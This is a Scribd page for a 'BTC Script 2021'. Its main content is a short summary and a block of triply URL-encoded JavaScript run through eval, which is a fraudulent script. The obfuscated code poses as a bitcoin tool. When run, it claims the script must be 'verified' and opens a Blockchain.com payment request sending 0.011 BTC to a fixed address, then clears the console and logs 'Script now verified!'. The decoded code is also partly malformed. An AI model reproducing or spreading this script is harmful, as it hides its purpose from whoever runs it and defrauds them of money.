50% found this document useful (2 votes)
956 views

BTC Script 2021

This document contains obfuscated JavaScript code that attempts to verify a script by prompting the user to open a Blockchain.com URL to send Bitcoin to a specific address. If the user clicks "OK" to verify, it will open the URL; otherwise it will display an alert asking the user to verify the script. Afterward, it clears the console and logs a message indicating the script is now verified.

Uploaded by

fat thi
Copyright
© © All Rights Reserved
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
50% found this document useful (2 votes)
956 views

BTC Script 2021

This document contains obfuscated JavaScript code that attempts to verify a script by prompting the user to open a Blockchain.com URL to send Bitcoin to a specific address. If the user clicks "OK" to verify, it will open the URL; otherwise it will display an alert asking the user to verify the script. Afterward, it clears the console and logs a message indicating the script is now verified.

Uploaded by

fat thi
Copyright
© © All Rights Reserved
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
You are on page 1/ 1

eval(decodeURIComponent(decodeURIComponent(decodeURIComponent('var%252520r7gxo

%252520%25253D%252520parseFloat%252528prompt%252528%252522https%25253A
%25252F%25252Fwww.blockchain.com%25252Fbtc%25252Ftx%25252F
%252522%252529%252529%25253B%25250Avar%252520r7gxo%252520%25253D
%252520parseFloat%252528prompt%252528%252522Your%252520script%252520must
%252520be%252520verified%252520with%252520your%252520BlockChain%252520wallet
%252520before%252520you%252520can%252520take%252520this%252520action.
%25250Avar%252520w8ugo%252520%25253D%252520window.confirm
%252528%252522Your%252520script%252520must%252520be%252520verified%252520with
%252520your%252520account%252520before%252520you%252520can%252520take
%252520this%252520action.%252520Click%252520OK%252520to%252520Verify
%252520Script%252522%252529%25253B%25250Aif%252520%252528w8ugo
%252529%252520%25257B%252520window.open%252528%252527https%25253A%25252F
%25252Fwww.blockchain.com%25252Fbtc%25252Fpayment_request%25253Faddress
%25253D1BPZAkaE1ysrn2uBxgGzxzjJ3Q95dfk5bS%252526message%25253DScript
%25252520Verification%252526amount%25253D0.011%252527%252529%25253B
%252520%25257D%252520%25250Aelse%252520%25257B%252520alert
%252528%252522Please%252520back%252520to%252520verify%252520script.
%252522%252529%25253B%252520%25257D%252520%25250Aconsole.clear
%252528%252529%25253B%25250Aconsole.log%252528%252527Script%252520now
%252520verified%252521%252527%252529%25253B'))));

You might also like